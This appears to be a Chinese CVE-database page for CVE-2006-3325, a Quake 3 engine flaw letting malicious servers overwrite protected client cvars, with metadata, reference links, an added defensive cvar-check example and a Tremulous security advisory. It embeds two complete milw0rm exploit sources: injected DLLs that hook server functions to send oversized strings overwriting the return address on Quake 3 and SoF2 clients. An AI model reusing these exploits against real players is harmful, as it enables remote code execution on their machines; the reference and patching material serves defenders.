CVE-2006-3325
CVSS 5.0
Published: 2006-06-30 19:05:00
Last modified: 2011-03-07 21:38:21

[Original text] client/cl_parse.c in the id3 Quake 3 Engine 1.32c and the Icculus Quake 3 Engine (ioquake3) revision 810 and earlier allows remote malicious servers to overwrite arbitrary write-protected cvars variables on the client, such as cl_allowdownload for Automatic Downloading and fs_homepath for the quake3 path, via a string of cvar names and values sent from the server. NOTE: this can be combined with another vulnerability to overwrite arbitrary files.


[CNNVD] Quake 3 client/cl_parse.c input validation vulnerability (CNNVD-200606-604)

        client/cl_parse.c in the id3 Quake 3 Engine 1.32c and the Icculus Quake 3 Engine (ioquake3) revision 810 and earlier allows a remote malicious server to overwrite arbitrary write-protected cvar variables on the client, such as cl_allowdownload (automatic downloading) and fs_homepath (the quake3 path), via a string of cvar names and values sent from the server.
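A defender-side illustration of the check this vulnerability calls for, added here as an example and not code from the Quake 3 engine, ioquake3 or this record: the client parses the server-supplied info string of cvar names and values and refuses to write any cvar that carries a write-protect flag, so a server cannot flip cl_allowdownload or redirect fs_homepath. The cvar table, the flag names (CVAR_ROM, CVAR_INIT, CVAR_PROTECTED), the function names and the sample systeminfo string are all constructed for this example and are not the engine's own API.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed flag set: a cvar with any of these must never be changed by a
   remote server. The names mirror common engine conventions but are
   assumptions for this example. */
#define CVAR_ROM        0x01  /* read-only for the lifetime of the process */
#define CVAR_INIT       0x02  /* settable only from the command line at startup */
#define CVAR_PROTECTED  0x04  /* must not be changed by a remote server */
#define CVAR_VALUE_LEN  128

typedef struct {
    const char *name;
    char value[CVAR_VALUE_LEN];
    int flags;
} cvar_t;

typedef struct {
    int applied;   /* values written to an unprotected cvar */
    int rejected;  /* writes refused because the cvar is write-protected */
    int unknown;   /* names not in the table (ignored, never auto-created) */
} apply_result_t;

/* Constructed sample cvar table: two protected, two server-settable. */
static cvar_t g_cvars[] = {
    { "cl_allowdownload", "0",                 CVAR_PROTECTED },
    { "fs_homepath",      "/home/player/.q3a", CVAR_INIT | CVAR_PROTECTED },
    { "sv_fps",           "20",                0 },
    { "g_gametype",       "0",                 0 },
};
#define NUM_CVARS (sizeof(g_cvars) / sizeof(g_cvars[0]))

/* Constructed hostile systeminfo string: Quake 3 info strings are
   "\key\value\key\value" with backslash as the only separator. */
const char sample_systeminfo[] =
    "\\sv_fps\\30\\cl_allowdownload\\1\\fs_homepath\\/tmp/evil"
    "\\g_gametype\\4\\sv_bogus\\1";

/* Case-insensitive name match, as cvar names are not case-sensitive. */
static int name_equal(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == '\0' && *b == '\0';
}

cvar_t *cvar_find(const char *name)
{
    size_t i;
    for (i = 0; i < NUM_CVARS; i++)
        if (name_equal(g_cvars[i].name, name))
            return &g_cvars[i];
    return NULL;
}

const char *cvar_get(const char *name)
{
    cvar_t *c = cvar_find(name);
    return c ? c->value : NULL;
}

/* Copy the next backslash-delimited token into out (truncating safely) and
   return a pointer to the separator that ended it, or to the terminator. */
static const char *info_token(const char *p, char *out, size_t outlen)
{
    size_t n = 0;
    while (*p && *p != '\\') {
        if (n + 1 < outlen)
            out[n++] = *p;
        p++;
    }
    out[n] = '\0';
    return p;
}

/* Apply a server-sent info string, honouring write-protect flags. */
apply_result_t apply_server_systeminfo(const char *info)
{
    apply_result_t r = { 0, 0, 0 };
    char key[64], val[CVAR_VALUE_LEN];
    const char *p = info;

    while (*p) {
        if (*p == '\\') p++;                 /* leading separator */
        p = info_token(p, key, sizeof key);
        if (*p == '\\') p++;                 /* key/value separator */
        p = info_token(p, val, sizeof val);
        if (key[0] == '\0') break;           /* malformed tail: stop */

        cvar_t *c = cvar_find(key);
        if (!c) { r.unknown++; continue; }
        if (c->flags & (CVAR_ROM | CVAR_INIT | CVAR_PROTECTED)) {
            r.rejected++;                    /* server may not change this */
            continue;
        }
        strncpy(c->value, val, CVAR_VALUE_LEN - 1);
        c->value[CVAR_VALUE_LEN - 1] = '\0';
        r.applied++;
    }
    return r;
}

int main(void)
{
    apply_result_t r = apply_server_systeminfo(sample_systeminfo);
    printf("applied=%d rejected=%d unknown=%d\n", r.applied, r.rejected, r.unknown);
    printf("cl_allowdownload=%s fs_homepath=%s sv_fps=%s g_gametype=%s\n",
           cvar_get("cl_allowdownload"), cvar_get("fs_homepath"),
           cvar_get("sv_fps"), cvar_get("g_gametype"));
    return 0;
}
```

Run stand-alone, the block shows the intended outcome for the constructed sample: sv_fps and g_gametype are updated, cl_allowdownload and fs_homepath keep their values, and the unknown name is ignored rather than created. The vulnerable behaviour this record describes is the missing flag check on the `rejected` path; the rest of the parsing is the same either way.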

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:id_software:quake_3_engine:icculus_809
cpe:/a:id_software:quake_3_engine:1.32c
cpe:/a:id_software:quake_3_engine
cpe:/a:id_software:quake_3_engine:icculus_804
cpe:/a:id_software:quake_3_engine:icculus_803
cpe:/a:id_software:quake_3_engine:icculus_810
cpe:/a:id_software:quake_3_engine:icculus_807
cpe:/a:id_software:quake_3_engine:icculus_808
cpe:/a:id_software:quake_3_engine:icculus_805
cpe:/a:id_software:quake_3_engine:1.32b
cpe:/a:id_software:quake_3_engine:icculus_806

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3325
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3325
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-604
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/2569
(UNKNOWN)  VUPEN  ADV-2006-2569
http://www.securityfocus.com/bid/18685
(UNKNOWN)  BID  18685
http://www.securityfocus.com/archive/1/archive/1/438660/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060628 Re: Files and cvars overwriting in Quake 3 engine (1.32c / rev 803 / ...)
http://www.securityfocus.com/archive/1/archive/1/438515/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060627 Files and cvars overwriting in Quake 3 engine (1.32c / rev 803 / ...)
http://secunia.com/advisories/20851
(VENDOR_ADVISORY)  SECUNIA  20851
http://secunia.com/advisories/20401
(VENDOR_ADVISORY)  SECUNIA  20401
http://aluigi.altervista.org/adv/q3cfilevar-adv.txt
(UNKNOWN)  MISC  http://aluigi.altervista.org/adv/q3cfilevar-adv.txt
http://xforce.iss.net/xforce/xfdb/27486
(UNKNOWN)  XF  quake3-cvar-file-overwrite(27486)
http://xforce.iss.net/xforce/xfdb/26889
(UNKNOWN)  XF  quake3-clparsedownload-bo(26889)
http://securityreason.com/securityalert/1171
(UNKNOWN)  SREASON  1171

- Vulnerability information

Quake 3 client/cl_parse.c input validation vulnerability
Medium severity  Insufficient data
2006-06-30 00:00:00 2006-07-03 00:00:00
Remote  
        client/cl_parse.c in the id3 Quake 3 Engine 1.32c and the Icculus Quake 3 Engine (ioquake3) revision 810 and earlier allows a remote malicious server to overwrite arbitrary write-protected cvar variables on the client, such as cl_allowdownload (automatic downloading) and fs_homepath (the quake3 path), via a string of cvar names and values sent from the server.

- Advisories and patches

        

- Vulnerability information (1976)

Quake 3 Engine Client CG_ServerCommand() Remote Overflow Exploit (EDBID:1976)
windows dos
2006-07-02 Verified
0 RunningBon
N/A [Download]
/*
Quake 3 Engine Client CG_ServerCommand() Remote Stack Overflow Exploit (Win32)
Written by RunningBon

E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik

This is a DLL, which gets injected into the server exe.

You will need Microsoft Detours library to compile this exploit (http://research.microsoft.com/sn/detours/)

Use this responsibly. You are responsible for any damage you cause using this.

Info:
The string is heavily filtered before the overflow occurs, so a lot of bytes get stripped. Might want to try alphanum shellcode..
*/

#include <stdio.h>
#include <windows.h>
#include <detours.h>

struct VersionStruct {
	char *pVersionString;
	DWORD dwVersionStringAddr;
	DWORD dwSendServerCommandAddr;
	DWORD dwFillSize;
	DWORD dwNewEIP;
};

VersionStruct Versions[] = {
	{ "SOF2MP GOLD V1.03", 0x5598F8, 0x478660, 999, 0x33333333 },	//SoF2 1.03
};

VersionStruct *pVersion = NULL;

void (*orig_SV_SendServerCommand)(LPVOID pCl, const char *fmt, ...);
void SV_SendServerCommand_Hook(LPVOID pCl, const char *fmt, ...)
{
	char szString[4096];
	char *pPtr = NULL;

	if(pVersion != NULL)
	{
		memset(szString, 0, sizeof(szString));
		pPtr = &szString[0];

		memset(pPtr, 'a', pVersion->dwFillSize);
		pPtr += pVersion->dwFillSize;

		memcpy(pPtr, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
		pPtr += sizeof(DWORD);

		orig_SV_SendServerCommand(pCl, szString);
	}
}

bool WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved)
{
	if(dwReason == DLL_PROCESS_ATTACH)
	{
		for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
		{
			if(!stricmp((char*)Versions[i].dwVersionStringAddr, Versions[i].pVersionString))
			{
				pVersion = &Versions[i];
				break;
			}
		}

		if(pVersion == NULL)
		{
			//Could not find correct version
			return 1;
		}

		DetourFunction((BYTE*)pVersion->dwSendServerCommandAddr, (BYTE*)SV_SendServerCommand_Hook);
		_asm mov [orig_SV_SendServerCommand], eax
	}

	return 1;
}

// milw0rm.com [2006-07-02]

- Vulnerability information (1977)

Quake 3 Engine Client CS_ITEMS Remote Overflow Exploit (Win32) (EDBID:1977)
windows dos
2006-07-02 Verified
0 RunningBon
N/A [Download]
/*
Quake 3 Engine Client CS_ITEMS Remote Stack Overflow Exploit (Win32)
Written by RunningBon

E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik

This is a DLL, which gets injected into the server exe.

You will need Microsoft Detours library to compile this exploit (http://research.microsoft.com/sn/detours/)
I recommend you compile this with Microsoft Visual C++

Use this responsibly. You are responsible for any damage you cause using this.

Info:
The engine strips bytes >127, '%', and '\0' before it overflows, so you will need encoded shellcode and an EIP which doesn't contain any of these characters.
*/

#include <stdio.h>
#include <windows.h>
#include <detours.h>

struct VersionStruct {
	char *pVersionString;
	DWORD dwVersionStringAddr;
	DWORD dwSetConfigstringAddr;
	DWORD dwFillSize;
	DWORD dwNewEIP;
	int iCS_ITEM;
};

VersionStruct Versions[] = {
	{ "Quake 3: Arena", 0x4C1B94, 0x431E70, 836, 0x13333337, 27 },	//Quake 3 Arena 1.32c
	{ "Quake 3: Arena", 0x4D2184, 0x438610, 836, 0x13333337, 27 },	//Quake 3 Arena 1.32b
};

VersionStruct *pVersion = NULL;

void (*orig_SV_SetConfigstring)(int iIndex, const char *pVal);
void SV_SetConfigstring_Hook(int iIndex, const char *pVal)
{
	char szString[4096];
	char *pPtr = NULL;

	if(pVersion != NULL)
	{
		if(iIndex == pVersion->iCS_ITEM)
		{
			memset(szString, 0, sizeof(szString));
			pPtr = &szString[0];

			memset(pPtr, 'a', pVersion->dwFillSize);
			pPtr += pVersion->dwFillSize;

			memcpy(pPtr, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
			pPtr += sizeof(DWORD);

			orig_SV_SetConfigstring(iIndex, szString);

			return;
		}
	}

	orig_SV_SetConfigstring(iIndex, pVal);
}

bool WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved)
{
	if(dwReason == DLL_PROCESS_ATTACH)
	{
		for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
		{
			if(!stricmp((char*)Versions[i].dwVersionStringAddr, Versions[i].pVersionString))
			{
				pVersion = &Versions[i];
				break;
			}
		}

		if(pVersion == NULL)
		{
			//Could not find correct version
			return 1;
		}

		DetourFunction((BYTE*)pVersion->dwSetConfigstringAddr, (BYTE*)SV_SetConfigstring_Hook);
		_asm mov [orig_SV_SetConfigstring], eax
	}

	return 1;
}

// milw0rm.com [2006-07-02]

- Vulnerability information (F110095)

Tremulous Inherited Issues (PacketStormID:F110095)
2012-02-23 00:00:00
Simon McVittie  
advisory,vulnerability
CVE-2006-2082,CVE-2006-2236,CVE-2006-2875,CVE-2006-3324,CVE-2006-3325,CVE-2011-2674,CVE-2011-3012
[Download]

Tremulous, a team based FPS game with RTS elements, suffers from a large amount of old Quake related vulnerabilities.

Background
==========

Tremulous is a team-based FPS game with RTS elements. Its engine and
game logic are based on the GPL source release of the Quake III Arena
engine and game logic by id Software.

The de facto upstream developer of the Quake III engine is now another
fork, ioquake3; in particular, ioquake3 fixes many security
vulnerabilities present in the original Quake III Arena source release.
Unlike (for instance) OpenArena or Urban Terror, Tremulous has diverged
from the original Quake III Arena engine, so it cannot be played using
an unmodified ioquake3 engine.

The Tremulous website advertises two versions of the game:

* 1.1.0, a stable release (released 2006-03-31). This is packaged
  in Debian/Ubuntu stable releases, and also appears to be packaged
  in FreeBSD, openSUSE and Gentoo.

* GPP1 ("Gameplay Preview 1"), a preview release (2009-12-03) of
  what will eventually become Tremulous 1.2. This
  appears to be packaged in Fedora stable releases.

In addition, there are several unofficial engine updates compatible with
1.1.0, notably a backport by Tony White (TJW), and a set of updated
client and server provided by Mercenaries' Guild. These are not
publicized by the main Tremulous website, but they are apparently
popular with players, and their functionality has been incorporated into
version 1.2 development.

Vulnerabilities
===============

Numerous security vulnerabilities have been reported and fixed in
ioquake3 since its initial release. Neither Tremulous 1.1.0 nor GPP1
incorporates fixes for all of these vulnerabilities.

I believe this table is more or less accurate, but I have only checked
Tremulous 1.1.0 in detail. If you ship one of the other versions, you
will need to do your own checks.

               Trem-1.1.0    MGC-1.011    MGS-1.01     tjw    Trem-GPP1
CVE-2001-1289       OK           OK           OK        OK       OK
CVE-2005-0430       OK           OK           OK        OK       OK
CVE-2005-0983       OK           OK           OK        OK       OK
CVE-2006-2082       Vuln         n/a          ?         Vuln     OK
CVE-2006-2236       Vuln         OK           n/a       OK       OK
CVE-2006-2875       Vuln         OK           n/a       OK       OK
CVE-2006-3324       Vuln         OK           n/a       Vuln     OK
CVE-2006-3325       Vuln         OK           n/a       Vuln     OK
CVE-2006-3400       OK           OK           OK        OK       OK
CVE-2006-3401       OK           OK           OK        OK       OK
CVE-2011-1412       OK           OK           OK        OK       OK
CVE-2011-2674       Vuln         Vuln         n/a       Vuln     Vuln
CVE-2011-3012       Vuln         OK           n/a       Vuln     OK

(For completeness, the table lists all CVE IDs I've found listed for
either Quake III Arena or ioquake3.)

Key: Trem-1.1.0 = Tremulous 1.1.0 (2006-03-31)
     MGC-1.011 = MercenariesGuild client 1.011 when used as a client
     MGS-1.01 = MercenariesGuild server 1.01 when used as a server
     tjw = http://tremulous.tjw.org/backport/
     Trem-GPP1 = Tremulous Gameplay Preview 1 (1.2 prerelease,
                 2009-12-03)

     Vuln = vulnerable
     partial = partial fix, probably still vulnerable
     n/a = server-specific bug not applicable to client or vice versa

In addition, searching ioquake3 commit history reveals a number of
commits which do not appear to be related to a CVE number, but could be
security-sensitive. I have not analyzed which of these could affect the
Tremulous engine. If you cause a new CVE number to be assigned for any
changes made to ioquake3 in the past (as was done for CVE-2011-3012),
please include a prominent reference to the relevant svn revision in any
advisory, so that CVE numbers can be correlated with the changes required.

Finally, to the best of my knowledge, ioquake3 upstream do not consider
the QVM bytecode interpreter to be safe for use with untrusted bytecode;
this means that auto-downloading (cl_allowDownload 1) is not considered
to be safe under any circumstances. This is particularly the case for
engines which do not have the interpreter/JIT hardening work that was
done in ioquake3 at svn revisions around 1687, 1717 and 2000, none of
which is present in at least Tremulous 1.1.0.

Response
========

I have not received any response from Tremulous developers since I
contacted them privately 1 month ago.

Distributions like Debian, Fedora and Ubuntu should either fix the open
vulnerabilities, or remove affected Tremulous versions from their
repositories entirely.

I have uploaded tremulous 1.1.0-7 to Debian, with backports of the
various CVE fixes from ioquake3, and some additional pre-emptive changes
for potential bugs which are not known to be exploitable (avoiding
non-constant format strings and sprintf() into a fixed-length buffer).
Patches which I believe to be correct are available at
<http://anonscm.debian.org/gitweb/?p=pkg-games/tremulous.git;a=tree;f=debian/patches>
or by cloning the git repository
<git://anonscm.debian.org/pkg-games/tremulous.git>. Please contact me
via the Debian bug tracking system or the Games Team mailing list
<debian-devel-games@lists.debian.org> with testing results or
corrections for these patches.

I believe that long-term-supported distributions should also mitigate
any future vulnerabilities in the ioquake3 bytecode interpreter by
removing client-side support for auto-downloading (always behaving as if
configured with cl_allowDownload 0) in their stable releases. I have
made this change in Debian's tremulous 1.1.0-7 package, but not yet in
Debian's ioquake3 package.

Regards,
    S

- Vulnerability information

26929
Multiple Vendor Quake 3 Engine client/cl_parse.c cvars Variable Overwrite
Exploit Public Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-06-27 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's websites.